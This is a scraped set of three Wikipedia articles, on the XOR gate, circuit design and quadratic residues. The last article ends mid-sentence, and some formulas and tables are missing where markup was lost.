XOR gate(sometimesEOR, orEXORand pronounced asExclusive OR) is a digitallogic gatethat gives a true (1 or HIGH) output when the number of true inputs is odd. An XOR gate implements anexclusive or(↮{\displaystyle \nleftrightarrow }) frommathematical logic; that is, a true output results if one, and only one, of the inputs to the gate is true. If both inputs are false (0/LOW) or both are true, a false output results. XOR represents the inequality function, i.e., the output is true if the inputs are not alike otherwise the output is false. A way to remember XOR is "must have one or the other but not both". An XOR gate may serve as a "programmable inverter" in which one input determines whether to invert the other input, or to simply pass it along with no change. Hence it functions as ainverter(a NOT gate) which may be activated or deactivated by a switch.[1][2] XOR can also be viewed as additionmodulo2. As a result, XOR gates are used to implement binary addition in computers. Ahalf adderconsists of an XOR gate and anAND gate. The gate is also used insubtractorsandcomparators.[3] Thealgebraic expressionsA⋅B¯+A¯⋅B{\displaystyle A\cdot {\overline {B}}+{\overline {A}}\cdot B}or(A+B)⋅(A¯+B¯){\displaystyle (A+B)\cdot ({\overline {A}}+{\overline {B}})}or(A+B)⋅(A⋅B)¯{\displaystyle (A+B)\cdot {\overline {(A\cdot B)}}}orA⊕B{\displaystyle A\oplus B}all represent the XOR gate with inputsAandB. The behavior of XOR is summarized in thetruth tableshown on the right. There are three schematic symbols for XOR gates: the traditional ANSI and DIN symbols and theIECsymbol. In some cases, the DIN symbol is used with ⊕ instead of ≢. For more information seeLogic Gate Symbols. The "=1" on the IEC symbol indicates that the output is activated by only one active input. Thelogic symbols⊕,Jpq, and ⊻ can be used to denote an XOR operation in algebraic expressions. C-like languagesuse thecaretsymbol^to denote bitwise XOR. (Note that the caret does not denotelogical conjunction(AND) in these languages, despite the similarity of symbol.) The XOR gate is most commonly implemented usingMOSFETscircuits. Some of those implementations include: XOR gates can be implemented using AND-OR-Invert (AOI) or OR-AND-Invert (OAI) logic.[4] The metal–oxide–semiconductor (CMOS) implementations of the XOR gate corresponding to the AOI logic above are shown below. On the left, thenMOSandpMOStransistors are arranged so that the input pairsA⋅B¯{\displaystyle A\cdot {\overline {B}}}andA¯⋅B{\displaystyle {\overline {A}}\cdot B}activate the 2 pMOS transistors of the top left or the 2 pMOS transistors of the top right respectively, connecting Vdd to the output for a logic high. The remaining input pairsA⋅B{\displaystyle A\cdot B}andA¯⋅B¯{\displaystyle {\overline {A}}\cdot {\overline {B}}}activate each one of the two nMOS paths in the bottom to Vss for a logic low.[5] If inverted inputs (for example from aflip-flop) are available, this gate can be used directly. Otherwise, two additional inverters with two transistors each are needed to generateA¯{\displaystyle {\overline {A}}}andB¯{\displaystyle {\overline {B}}}, bringing the total number of transistors to twelve. The AOI implementation without inverted input has been used, for example, in theIntel 386CPU.[6] The XOR gate can also be implemented through the use oftransmission gateswithpass transistor logic. This implementation uses two Transmission gates and two inverters not shown in the diagram to generateA¯{\displaystyle {\overline {A}}}andB¯{\displaystyle {\overline {B}}}for a total of eight transistors, four less than in the previous design. The XOR function is implemented by passing through to the output the inverted value of A when B is high and passing the value of A when B is at a logic low. so when both inputs are low the transmission gate at the bottom is off and the one at the top is on and lets A through which is low so the output is low. When both are high only the one at the bottom is active and lets the inverted value of A through and since A is high the output will again be low. Similarly if B stays high but A is low the output would beA¯{\displaystyle {\overline {A}}}which is high as expected and if B is low but A is high the value of A passes through and the output is high completing the truth table for the XOR gate.[7] The trade-off with the previous implementation is that since transmission gates are not ideal switches, there is resistance associated with them, so depending on the signal strength of the input, cascading them may degrade the output levels.[8] The previous transmission gate implementation can be further optimized from eight to six transistors by implementing the functionality of the inverter that generatesA¯{\displaystyle {\overline {A}}}and the bottom pass-gate with just two transistors arranged like an inverter but with the source of the pMOS connected toB{\displaystyle B}instead ofVddand the source of the nMOS connected toB¯{\displaystyle {\overline {B}}}instead of GND.[8] The two leftmost transistors mentioned above, perform an optimized conditional inversion of A when B is at a logic high using pass transistor logic to reduce the transistor count and when B is at a logic low, their output is at a high impedance state. The two in the middle are atransmission gatethat drives the output to the value of A when B is at a logic low and the two rightmost transistors form an inverter needed to generateB¯{\displaystyle {\overline {B}}}used by the transmission gate and the pass transistor logic circuit.[9] As with the previous implementation, the direct connection of the inputs to the outputs through the pass gate transistors or through the two leftmost transistors, should be taken into account, especially when cascading them.</ref> Replacing the second NOR with a normalOR Gatewill create anXNOR Gate.[8] If a specific type of gate is not available, a circuit that implements the same function can be constructed from other available gates. A circuit implementing an XOR function can be trivially constructed from anXNOR gatefollowed by aNOT gate. If we consider the expression(A⋅B¯)+(A¯⋅B){\displaystyle (A\cdot {\overline {B}})+({\overline {A}}\cdot B)}, we can construct an XOR gate circuit directly using AND, OR andNOT gates. However, this approach requires five gates of three different kinds. As alternative, if different gates are available we can applyBoolean algebrato transform(A⋅B¯)+(A¯⋅B)≡(A+B)⋅(A¯+B¯){\displaystyle (A\cdot {\overline {B}})+({\overline {A}}\cdot B)\equiv (A+B)\cdot ({\overline {A}}+{\overline {B}})}as stated above, and applyde Morgan's lawto the last term to get(A+B)⋅(A⋅B)¯{\displaystyle (A+B)\cdot {\overline {(A\cdot B)}}}which can be implemented using only four gates as shown on the right. intuitively, XOR is equivalent to OR except for when both A and B are high. So the AND of the OR with then NAND that gives a low only when both A and B are high is equivalent to the XOR. An XOR gate circuit can be made from fourNAND gates. In fact, both NAND andNOR gatesare so-called "universal gates" and any logical function can be constructed from eitherNAND logicorNOR logicalone. If the fourNAND gatesare replaced byNOR gates, this results in anXNOR gate, which can be converted to an XOR gate by inverting the output or one of the inputs (e.g. with a fifthNOR gate). An alternative arrangement is of fiveNOR gatesin a topology that emphasizes the construction of the function from(A+B)⋅(A¯+B¯){\displaystyle (A+B)\cdot ({\overline {A}}+{\overline {B}})}, noting fromde Morgan's Lawthat aNOR gateis an inverted-inputAND gate. Another alternative arrangement is of fiveNAND gatesin a topology that emphasizes the construction of the function from(A⋅B¯)+(A¯⋅B){\displaystyle (A\cdot {\overline {B}})+({\overline {A}}\cdot B)}, noting fromde Morgan's Lawthat aNAND gateis an inverted-inputOR gate. For the NAND constructions, the upper arrangement requires fewer gates. For the NOR constructions, the lower arrangement offers the advantage of a shorter propagation delay (the time delay between an input changing and the output changing). XOR chips are readily available. The most common standard chip codes are: Literal interpretation of the name "exclusive or", or observation of the IEC rectangular symbol, raises the question of correct behaviour with additional inputs.[12]If a logic gate were to accept three or more inputs and produce a true output if exactly one of those inputs were true, then it would in effect be aone-hotdetector (and indeed this is the case for only two inputs). However, it is rarely implemented this way in practice. It is most common to regard subsequent inputs as being applied through a cascade of binary exclusive-or operations: the first two signals are fed into an XOR gate, then the output of that gate is fed into a second XOR gate together with the third signal, and so on for any remaining signals. The result is a circuit that outputs a 1 when the number of 1s at its inputs is odd, and a 0 when the number of incoming 1s is even. This makes it practically useful as aparity generatoror a modulo-2adder. For example, the74LVC1G386microchip is advertised as a three-input logic gate, and implements a parity generator.[13] XOR gates and AND gates are the two most-used structures inVLSIapplications.[14] The XOR logic gate can be used as a one-bitadderthat adds any two bits together to output one bit. For example, if we add1plus1inbinary, we expect a two-bit answer,10(i.e.2in decimal). Since the trailingsumbit in this output is achieved with XOR, the precedingcarrybit is calculated with anAND gate. This is the main principle inHalf Adders. A slightly largerFull Addercircuit may be chained together in order to add longer binary numbers. In certain situations, the inputs to an OR gate (for example, in a full-adder) or to an XOR gate can never be both 1's. As this is the only combination for which the OR and XOR gate outputs differ, anOR gatemay be replaced by an XOR gate (or vice versa) without altering the resulting logic. This is convenient if the circuit is being implemented using simple integrated circuit chips which contain only one gate type per chip. Pseudo-random number (PRN) generators, specificallylinear-feedback shift registers(LFSR), are defined in terms of the exclusive-or operation. Hence, a suitable setup of XOR gates can model a linear-feedback shift register, in order to generate random numbers. XOR gates may be used in simplestphase detectors.[15]: 425 An XOR gate may be used to easily change between buffering or inverting a signal. For example, XOR gates can be added to the output of aseven-segment displaydecoder circuitto allow a user to choose between active-low or active-high output. XOR gates produce a0when both inputs match. When searching for a specific bit pattern or PRN sequence in a very long data sequence, a series of XOR gates can be used to compare a string of bits from the data sequence against the target sequence in parallel. The number of0outputs can then be counted to determine how well the data sequence matches the target sequence. Correlators are used in many communications devices such asCDMAreceivers and decoders for error correction and channel codes. In a CDMA receiver, correlators are used to extract the polarity of a specific PRN sequence out of a combined collection of PRN sequences. A correlator looking for11010in the data sequence1110100101would compare the incoming data bits against the target sequence at every possible offset while counting the number of matches (zeros): In this example, the best match occurs when the target sequence is offset by 1 bit and all five bits match. When offset by 5 bits, the sequence exactly matches its inverse. By looking at the difference between the number of ones and zeros that come out of the bank of XOR gates, it is easy to see where the sequence occurs and whether or not it is inverted. Longer sequences are easier to detect than short sequences. f(a,b)=a+b−2ab{\displaystyle f(a,b)=a+b-2ab}is an analytical representation of XOR gate: f(a,b)=|a−b|{\displaystyle f(a,b)=|a-b|}is an alternative analytical representation.
https://en.wikipedia.org/wiki/XOR_gate
InElectrical Engineering, the process ofcircuit designcan cover systems ranging from complexelectronicsystems down to the individualtransistorswithin anintegrated circuit. One person can often do thedesign processwithout needing a planned or structured design process for simple circuits. Still, teams of designers following a systematic approach with intelligently guidedcomputer simulationare becoming increasingly common for more complex designs. In integrated circuitdesign automation, the term "circuit design" often refers to the step of the design cycle which outputs theschematicsof the integrated circuit. Typically this is the step betweenlogic designandphysical design.[1] Traditional circuit design usually involves several stages. Sometimes, adesign specificationis written after liaising with the customer. Atechnical proposalmay be written to meet the requirements of the customer specification. The next stage involvessynthesisingon paper aschematiccircuit diagram, an abstract electrical or electronic circuit that will meet the specifications. A calculation of the component values to meet the operating specifications under specified conditions should be made. Simulations may be performed toverifythe correctness of the design. Abreadboardor other prototype version of the design for testing against specification may be built. It may involve making any alterations to the circuit to achieve compliance. A choice as to a method of construction and all the parts and materials to be used must be made. There is a presentation of component and layout information to draughtspersons and layout and mechanical engineers for prototype production. This is followed by the testing or type-testing several prototypes to ensure compliance with customer requirements. Usually, there is a signing and approval of the final manufacturing drawings, and there may be post-design services (obsolescenceof components, etc.). The process of circuit design begins with thespecification, which states the functionality that the finished design must provide but does not indicate how it is to be achieved .[2]The initial specification is a technically detailed description of what the customer wants the finished circuit to achieve and can include a variety ofelectrical requirements, such as what signals the circuit will receive, what signals it must output, what power supplies are available and how much power it is permitted to consume. The specification can (and normally does) also set some of the physical parameters that the design must meet, such as size, weight,moisture resistance, temperature range, thermal output, vibration tolerance, and acceleration tolerance.[3] As the design process progresses, the designer(s) will frequently return to the specification and alter it to take account of the progress of the design. This can involve tightening specifications that the customer has supplied and adding tests that the circuit must pass to be accepted. These additional specifications will often be used in the verification of a design. Changes that conflict with or modify the customer's original specifications will almost always have to be approved by the customer before they can be acted upon. Correctly identifying the customer needs can avoid a condition known as 'design creep', which occurs in the absence of realistic initial expectations, and later by failing to communicate fully with the client during the design process. It can be defined in terms of its results; "at one extreme is a circuit with more functionality than necessary, and at the other is a circuit having an incorrect functionality".[4][who?]Nevertheless, some changes can be expected. It is good practice to keep options open for as long as possible because it's easier to remove spare elements from the circuit later on than it is to put them in. The design process involves moving from the specification at the start to a plan that contains all the information needed to be physically constructed at the end; this happens typically by passing through several stages, although in the straightforward circuit, it may be done in a single step.[5]The process usually begins with the conversion of the specification into ablock diagramof the various functions that the circuit must perform, at this stage the contents of each block are not considered, only what each block must do, this is sometimes referred to as a "black box" design. This approach allows the possibly highly complex task to be broken into smaller tasks either by tackled in sequence or divided amongst members of a design team. Each block is then considered in more detail, still at an abstract stage, but with a lot more focus on the details of the electrical functions to be provided. At this or later stages, it is common to require a large amount of research ormathematical modelinginto what is and is not feasible to achieve.[6]The results of this research may be fed back into earlier stages of the design process, for example if it turns out one of the blocks cannot be designed within the parameters set for it, it may be necessary to alter other blocks instead. At this point, it is also common to start considering both how to demonstrate that the design does meet the specifications, and how it is to be tested ( which can includeself diagnostictools ).[7] Finally, the individual circuitcomponentsare chosen to carry out each function in the overall design; at this stage, the physical layout and electrical connections of each component are also decided, this layout commonly taking the form of artwork for the production of aprinted circuit boardor Integrated circuit. This stage is typically highly time-consuming because of the vast array of choices available. A practical constraint on the design at this stage is standardization;. At the same time, a certain value of a component may be calculated for use in some location in a circuit; if that value cannot be purchased from a supplier, then the problem has still not been solved. To avoid this, a certain amount of 'catalog engineering' can be applied to solve the more mundane tasks within an overall design. In general, the circuit principles of design flow are including but not limited to architecture scope definition, materials selection, schematic capture, PCB layout design that include power and signal integrity considition, test and validation.[8] Generally, the cost of designing circuits is directly tied to the final circuits' complexity. The greater the complexity (quantity of components and design novelty), the more hours of a skilled engineer's time will be necessary to create a functional product. The process can be tedious, as minute details or features could take any amount of time, materials and manpower to create. Like taking into account the effects of modifying transistor sizes or codecs.[9]In the world offlexible electronics, replacing the, widely used, polyamide substrates with materials like PEN or PET to produce flexible electronics, could reduce costs by factors of 5-10.[10] Costs for designing a circuit are almost always far higher than production costs per unit, as the cost of production and function of the circuit depends greatly on the design of the circuit.[11] Although the typical PCB production methods involve subtractive manufacturing, there are methods that use an additive manufacturing process, such as using a 3D printer to "print" a PCB. This method is thought to cost less than additive manufacturing and eliminates the need for waste management altogether.[12] Once a circuit has been designed, it must be bothverifiedand tested. Verification is the process of going through each stage of a design and ensuring that it will do what the specification requires it to do. This is frequently a highly mathematical process and can involve large-scale computer simulations of the design. In any complicated design, it is very likely that problems will be found at this stage and may affect a large amount of the design work to be redone to fix them. Testing is the real-world counterpart to verification; testing involves physically building at least a prototype of the design and then (in combination with the test procedures in the specification or added to it) checking the circuit does what it was designed to. In the Software of the visual DSD, the Logic Circuit of complement circuit is implemented by the compiling program code. These types of software programs are creating cheaper more efficient circuits for all types of circuits.[13]We have implemented functional simulations to verify logic functions corresponding to logic expressions in our proposed circuits. The proposed architectures are modeled in VHDL language. Using this language will create more efficient circuits that will not only be cheaper but last longer. These are only two of many design software that help individuals plan there circuits for production.[14] Prototyping plays a significant role in the complex process of circuit design. This iterative process involves continuous refinement and correction of errors. The task of circuit design is demanding and requires meticulous attention to detail to avoid errors. Circuit designers are required to conduct multiple tests to ensure the efficiency and safety of their designs before they are deemed suitable for consumer use.[15] Prototyping is an integral part of electrical work due to its precise and meticulous nature. The absence of prototyping could potentially lead to errors in the final product. Circuit designers, who are compensated for their expertise in creating electrical circuits, bear the responsibility of ensuring the safety of consumers who purchase and use these circuits at home. The risks associated with neglecting the prototyping process and releasing a flawed electrical circuit are significant. These risks include the potential for fires and overheated wires, which could result in burns or severe injuries to unsuspecting individuals.[15] Every electrical circuit starts with a circuit board simulator of how the things will be put together at the end of the day and show how the circuit will work virtually.[16]A blueprint is the drawing of the technical design and final product. After all, this is done, and you use the blueprint to put the circuit together, you will get the results of electrical circuits that are quite memorable. The circuit will run anything from a vacuum to a big TV in a movie theater. All of these take a long time and a certain skill not everyone can acquire. The electrical circuit is something most things we need in our everyday lives. Any commercial design will normally also include an element of documentation; the precise nature of this documentation will vary according to the size and complexity of the circuit and the country in which it is to be used. As a bare minimum, the documentation will normally include at least the specification and testing procedures for the design and a statement of compliance with current regulations. In theEUthis last item will normally take the form of aCE Declarationlisting the European directives complied with and naming an individual responsible for compliance.[17]
https://en.wikipedia.org/wiki/Circuit_design
Innumber theory, anintegerqis aquadratic residuemodulonif it iscongruentto aperfect squaremodulon; that is, if there exists an integerxsuch that Otherwise,qis aquadratic nonresiduemodulon. Quadratic residues are used in applications ranging fromacoustical engineeringtocryptographyand thefactoring of large numbers. Fermat,Euler,Lagrange,Legendre, and other number theorists of the 17th and 18th centuries established theorems[1]and formed conjectures[2]about quadratic residues, but the first systematic treatment is § IV ofGauss'sDisquisitiones Arithmeticae(1801). Article 95 introduces the terminology "quadratic residue" and "quadratic nonresidue", and says that if the context makes it clear, the adjective "quadratic" may be dropped. For a givenn, a list of the quadratic residues modulonmay be obtained by simply squaring all the numbers 0, 1, ...,n− 1. Sincea≡b(modn) impliesa2≡b2(modn), any other quadratic residue is congruent (modn) to some in the obtained list. But the obtained list is not composed of mutually incongruent quadratic residues (mod n) only. Sincea2≡(n−a)2(modn), the list obtained by squaring all numbers in the list 1, 2, ...,n− 1(or in the list 0, 1, ...,n) is symmetric (modn) around its midpoint, hence it is actually only needed to square all the numbers in the list 0, 1, ...,⌊{\displaystyle \lfloor }n/2⌋{\displaystyle \rfloor }. The list so obtained may still contain mutually congruent numbers (modn). Thus, the number of mutually noncongruent quadratic residues moduloncannot exceedn/2 + 1 (neven) or (n+ 1)/2 (nodd).[3] The product of two residues is always a residue. Modulo 2, every integer is a quadratic residue. Modulo an oddprime numberpthere are (p+ 1)/2 residues (including 0) and (p− 1)/2 nonresidues, byEuler's criterion. In this case, it is customary to consider 0 as a special case and work within themultiplicative group of nonzero elementsof thefield(Z/pZ){\displaystyle (\mathbb {Z} /p\mathbb {Z} )}. In other words, every congruence class except zero modulophas a multiplicative inverse. This is not true for composite moduli.[4] Following this convention, the multiplicative inverse of a residue is a residue, and the inverse of a nonresidue is a nonresidue.[5] Following this convention, modulo an odd prime number there is an equal number of residues and nonresidues.[4] Modulo a prime, the product of two nonresidues is a residue and the product of a nonresidue and a (nonzero) residue is a nonresidue.[5] The first supplement[6]to thelaw of quadratic reciprocityis that ifp≡ 1 (mod 4) then −1 is a quadratic residue modulop, and ifp≡ 3 (mod 4) then −1 is a nonresidue modulop. This implies the following: Ifp≡ 1 (mod 4) the negative of a residue modulopis a residue and the negative of a nonresidue is a nonresidue. Ifp≡ 3 (mod 4) the negative of a residue modulopis a nonresidue and the negative of a nonresidue is a residue. All odd squares are ≡ 1 (mod 8) and thus also ≡ 1 (mod 4). Ifais an odd number andm= 8, 16, or some higher power of 2, thenais a residue modulomif and only ifa≡ 1 (mod 8).[7] For example, mod (32) the odd squares are and the even ones are So a nonzero number is a residue mod 8, 16, etc., if and only if it is of the form 4k(8n+ 1). A numberarelatively prime to an odd primepis a residue modulo any power ofpif and only if it is a residue modulop.[8] If the modulus ispn, Notice that the rules are different for powers of two and powers of odd primes. Modulo an odd prime powern=pk, the products of residues and nonresidues relatively prime topobey the same rules as they do modp;pis a nonresidue, and in general all the residues and nonresidues obey the same rules, except that the products will be zero if the power ofpin the product ≥n. Modulo 8, the product of the nonresidues 3 and 5 is the nonresidue 7, and likewise for permutations of 3, 5 and 7. In fact, the multiplicative group of the non-residues and 1 form theKlein four-group. The basic fact in this case is Modulo a composite number, the product of two residues is a residue. The product of a residue and a nonresidue may be a residue, a nonresidue, or zero. For example, from the table for modulus 61, 2,3,4, 5 (residues inbold). The product of the residue 3 and the nonresidue 5 is the residue 3, whereas the product of the residue 4 and the nonresidue 2 is the nonresidue 2. Also, the product of two nonresidues may be either a residue, a nonresidue, or zero. For example, from the table for modulus 151, 2, 3,4, 5,6, 7, 8,9,10, 11, 12, 13, 14 (residues inbold). The product of the nonresidues 2 and 8 is the residue 1, whereas the product of the nonresidues 2 and 7 is the nonresidue 14. This phenomenon can best be described using the vocabulary of abstract algebra. The congruence classes relatively prime to the modulus are agroupunder multiplication, called thegroup of unitsof thering(Z/nZ){\displaystyle (\mathbb {Z} /n\mathbb {Z} )}, and the squares are asubgroupof it. Different nonresidues may belong to differentcosets, and there is no simple rule that predicts which one their product will be in. Modulo a prime, there is only the subgroup of squares and a single coset. The fact that, e.g., modulo 15 the product of the nonresidues 3 and 5, or of the nonresidue 5 and the residue 9, or the two residues 9 and 10 are all zero comes from working in the full ring(Z/nZ){\displaystyle (\mathbb {Z} /n\mathbb {Z} )}, which haszero divisorsfor compositen. For this reason some authors[10]add to the definition that a quadratic residueamust not only be a square but must also berelatively primeto the modulusn. (ais coprime tonif and only ifa2is coprime ton.) Although it makes things tidier, this article does not insist that residues must be coprime to the modulus. Gauss[11]usedRandNto denote residuosity and non-residuosity, respectively; Although this notation is compact and convenient for some purposes,[12][13]a more useful notation is theLegendre symbol, also called thequadratic character, which is defined for all integersaand positive oddprime numberspas There are two reasons why numbers ≡ 0 (modp) are treated specially. As we have seen, it makes many formulas and theorems easier to state. The other (related) reason is that the quadratic character is ahomomorphismfrom themultiplicative group of nonzero congruence classes modulopto thecomplex numbersunder multiplication. Setting(npp)=0{\displaystyle ({\tfrac {np}{p}})=0}allows itsdomainto be extended to the multiplicativesemigroupof all the integers.[14] One advantage of this notation over Gauss's is that the Legendre symbol is a function that can be used in formulas.[15]It can also easily be generalized tocubic, quartic and higher power residues.[16] There is a generalization of the Legendre symbol for composite values ofp, theJacobi symbol, but its properties are not as simple: ifmis composite and the Jacobi symbol(am)=−1,{\displaystyle ({\tfrac {a}{m}})=-1,}thenaNm, and ifaRmthen(am)=1,{\displaystyle ({\tfrac {a}{m}})=1,}but if(am)=1{\displaystyle ({\tfrac {a}{m}})=1}we do not know whetheraRmoraNm. For example:(215)=1{\displaystyle ({\tfrac {2}{15}})=1}and(415)=1{\displaystyle ({\tfrac {4}{15}})=1}, but2 N 15and4 R 15. Ifmis prime, the Jacobi and Legendre symbols agree. Although quadratic residues appear to occur in a rather random pattern modulon, and this has been exploited in suchapplicationsasacousticsandcryptography, their distribution also exhibits some striking regularities. UsingDirichlet's theoremon primes inarithmetic progressions, thelaw of quadratic reciprocity, and theChinese remainder theorem(CRT) it is easy to see that for anyM> 0 there are primespsuch that the numbers 1, 2, ...,Mare all residues modulop. For example, ifp≡ 1 (mod 8), (mod 12), (mod 5) and (mod 28), then by the law of quadratic reciprocity 2, 3, 5, and 7 will all be residues modulop, and thus all numbers 1–10 will be. The CRT says that this is the same asp≡ 1 (mod 840), and Dirichlet's theorem says there are an infinite number of primes of this form. 2521 is the smallest, and indeed 12≡ 1, 10462≡ 2, 1232≡ 3, 22≡ 4, 6432≡ 5, 872≡ 6, 6682≡ 7, 4292≡ 8, 32≡ 9, and 5292≡ 10 (mod 2521). The first of these regularities stems fromPeter Gustav Lejeune Dirichlet's work (in the 1830s) on theanalytic formulafor theclass numberof binaryquadratic forms.[17]Letqbe a prime number,sa complex variable, and define aDirichlet L-functionas Dirichlet showed that ifq≡ 3 (mod 4), then Therefore, in this case (primeq≡ 3 (mod 4)), the sum of the quadratic residues minus the sum of the nonresidues in the range 1, 2, ...,q− 1 is a negative number. For example, modulo 11, In fact the difference will always be an odd multiple ofqifq> 3.[18]In contrast, for primeq≡ 1 (mod 4), the sum of the quadratic residues minus the sum of the nonresidues in the range 1, 2, ...,q− 1 is zero, implying that both sums equalq(q−1)4{\displaystyle {\frac {q(q-1)}{4}}}.[citation needed] Dirichlet also proved that for primeq≡ 3 (mod 4), This implies that there are more quadratic residues than nonresidues among the numbers 1, 2, ..., (q− 1)/2. For example, modulo 11 there are four residues less than 6 (namely 1, 3, 4, and 5), but only one nonresidue (2). An intriguing fact about these two theorems is that all known proofs rely on analysis; no-one has ever published a simple or direct proof of either statement.[19] Ifpandqare odd primes, then: ((pis a quadratic residue modq) if and only if (qis a quadratic residue modp)) if and only if (at least one ofpandqis congruent to 1 mod 4). That is: where(pq){\displaystyle \left({\frac {p}{q}}\right)}is theLegendre symbol. Thus, for numbersaand odd primespthat don't dividea: Modulo a primep, the number of pairsn,n+ 1 wherenRpandn+ 1 Rp, ornNpandn+ 1 Rp, etc., are almost equal. More precisely,[20][21]letpbe an odd prime. Fori,j= 0, 1 define the sets and let That is, Then ifp≡ 1 (mod 4) and ifp≡ 3 (mod 4) For example: (residues inbold) Modulo 17 Modulo 19 Gauss (1828)[22]introduced this sort of counting when he proved that ifp≡ 1 (mod 4) thenx4≡ 2 (modp) can be solved if and only ifp=a2+ 64b2. The values of(ap){\displaystyle ({\tfrac {a}{p}})}for consecutive values ofamimic a random variable like acoin flip.[23]Specifically,PólyaandVinogradovproved[24](independently) in 1918 that for any nonprincipalDirichlet characterχ(n) moduloqand any integersMandN, inbig O notation. Setting this shows that the number of quadratic residues moduloqin any interval of lengthNis It is easy[25]to prove that In fact,[26] MontgomeryandVaughanimproved this in 1977, showing that, if thegeneralized Riemann hypothesisis true then This result cannot be substantially improved, forSchurhad proved in 1918 that andPaleyhad proved in 1932 that for infinitely manyd> 0. The least quadratic residue modpis clearly 1. The question of the magnitude of the least quadratic non-residuen(p) is more subtle, but it is always prime, with 7 appearing for the first time at 71. The Pólya–Vinogradov inequality above gives O(√plogp). The best unconditional estimate isn(p) ≪pθfor any θ>1/4√e, obtained by estimates of Burgess oncharacter sums.[27] Assuming theGeneralised Riemann hypothesis, Ankeny obtainedn(p) ≪ (logp)2.[28] Linnikshowed that the number ofpless thanXsuch thatn(p) > Xεis bounded by a constant depending on ε.[27] The least quadratic non-residues modpfor odd primespare: Letpbe an odd prime. Thequadratic excessE(p) is the number of quadratic residues on the range (0,p/2) minus the number in the range (p/2,p) (sequenceA178153in theOEIS). Forpcongruent to 1 mod 4, the excess is zero, since −1 is a quadratic residue and the residues are symmetric underr↔p−r. Forpcongruent to 3 mod 4, the excessEis always positive.[29] That is, given a numberaand a modulusn, how hard is it An important difference between prime and composite moduli shows up here. Modulo a primep, a quadratic residueahas 1 + (a|p) roots (i.e. zero ifaNp, one ifa≡ 0 (modp), or two ifaRpand gcd(a,p) = 1.) In general if a composite modulusnis written as a product of powers of distinct primes, and there aren1roots modulo the first one,n2mod the second, ..., there will ben1n2... roots modulon. The theoretical way solutions modulo the prime powers are combined to make solutions modulonis called theChinese remainder theorem; it can be implemented with an efficient algorithm.[30] For example: First off, if the modulusnis prime theLegendre symbol(an){\displaystyle \left({\frac {a}{n}}\right)}can bequickly computedusing a variation ofEuclid's algorithm[31]or theEuler's criterion. If it is −1 there is no solution. Secondly, assuming that(an)=1{\displaystyle \left({\frac {a}{n}}\right)=1}, ifn≡ 3 (mod 4),Lagrangefound that the solutions are given by andLegendrefound a similar solution[32]ifn≡ 5 (mod 8): For primen≡ 1 (mod 8), however, there is no known formula.Tonelli[33](in 1891) andCipolla[34]found efficient algorithms that work for all prime moduli. Both algorithms require finding a quadratic nonresidue modulon, and there is no efficient deterministic algorithm known for doing that. But since half the numbers between 1 andnare nonresidues, picking numbersxat random and calculating the Legendre symbol(xn){\displaystyle \left({\frac {x}{n}}\right)}until a nonresidue is found will quickly produce one. A slight variant of this algorithm is theTonelli–Shanks algorithm. If the modulusnis aprime powern=pe, a solution may be found modulopand "lifted" to a solution modulonusingHensel's lemmaor an algorithm of Gauss.[8] If the modulusnhas been factored into prime powers the solution was discussed above. Ifnis not congruent to 2 modulo 4 and theKronecker symbol(an)=−1{\displaystyle \left({\tfrac {a}{n}}\right)=-1}then there is no solution; ifnis congruent to 2 modulo 4 and(an/2)=−1{\displaystyle \left({\tfrac {a}{n/2}}\right)=-1}, then there is also no solution. Ifnis not congruent to 2 modulo 4 and(an)=1{\displaystyle \left({\tfrac {a}{n}}\right)=1}, ornis congruent to 2 modulo 4 and(an/2)=1{\displaystyle \left({\tfrac {a}{n/2}}\right)=1}, there may or may not be one. If the complete factorization ofnis not known, and(an)=1{\displaystyle \left({\tfrac {a}{n}}\right)=1}andnis not congruent to 2 modulo 4, ornis congruent to 2 modulo 4 and(an/2)=1{\displaystyle \left({\tfrac {a}{n/2}}\right)=1}, the problem is known to be equivalent tointeger factorizationofn(i.e. an efficient solution to either problem could be used to solve the other efficiently). The above discussion indicates how knowing the factors ofnallows us to find the roots efficiently. Say there were an efficient algorithm for finding square roots modulo a composite number. The articlecongruence of squaresdiscusses how finding two numbers x and y wherex2≡y2(modn)andx≠ ±ysuffices to factorizenefficiently. Generate a random number, square it modulon, and have the efficient square root algorithm find a root. Repeat until it returns a number not equal to the one we originally squared (or its negative modulon), then follow the algorithm described in congruence of squares. The efficiency of the factoring algorithm depends on the exact characteristics of the root-finder (e.g. does it return all roots? just the smallest one? a random one?), but it will be efficient.[35] Determining whetherais a quadratic residue or nonresidue modulon(denotedaRnoraNn) can be done efficiently for primenby computing the Legendre symbol. However, for compositen, this forms thequadratic residuosity problem, which is not known to be ashardas factorization, but is assumed to be quite hard. On the other hand, if we want to know if there is a solution forxless than some given limitc, this problem isNP-complete;[36]however, this is afixed-parameter tractableproblem, wherecis the parameter. In general, to determine ifais a quadratic residue modulo compositen, one can use the following theorem:[37] Letn> 1, andgcd(a,n) = 1. Thenx2≡a(modn)is solvable if and only if: Note: This theorem essentially requires that the factorization ofnis known. Also notice that ifgcd(a,n) =m, then the congruence can be reduced toa/m≡x2/m(modn/m), but then this takes the problem away from quadratic residues (unlessmis a square). The list of the number of quadratic residues modulon, forn= 1, 2, 3 ..., looks like: A formula to count the number of squares modulonis given by Stangl.[38] Sound diffusershave been based on number-theoretic concepts such asprimitive rootsand quadratic residues.[39] Paley graphsare dense undirected graphs, one for each primep≡ 1 (mod 4), that form an infinite family ofconference graphs, which yield an infinite family ofsymmetricconference matrices. Paley digraphs are directed analogs of Paley graphs, one for eachp≡ 3 (mod 4), that yieldantisymmetricconference matrices. The construction of these graphs uses quadratic residues. The fact that finding a square root of a number modulo a large compositenis equivalent to factoring (which is widely believed to be ahard problem) has been used for constructingcryptographic schemessuch as theRabin cryptosystemand theoblivious transfer. Thequadratic residuosity problemis the basis for theGoldwasser-Micali cryptosystem. Thediscrete logarithmis a similar problem that is also used in cryptography. Euler's criterionis a formula for the Legendre symbol (a|p) wherepis prime. Ifpis composite the formula may or may not compute (a|p) correctly. TheSolovay–Strassen primality testfor whether a given numbernis prime or composite picks a randomaand computes (a|n) using a modification of Euclid's algorithm,[40]and also using Euler's criterion.[41]If the results disagree,nis composite; if they agree,nmay be composite or prime. For a compositenat least 1/2 the values ofain the range 2, 3, ...,n− 1 will return "nis composite"; for primennone will. If, after using many different values ofa,nhas not been proved composite it is called a "probable prime". TheMiller–Rabin primality testis based on the same principles. There is a deterministic version of it, but the proof that it works depends on thegeneralized Riemann hypothesis; the output from this test is "nis definitely composite" or "eithernis prime or the GRH is false". If the second output ever occurs for a compositen, then the GRH would be false, which would have implications through many branches of mathematics. In § VI of theDisquisitiones Arithmeticae[42]Gauss discusses two factoring 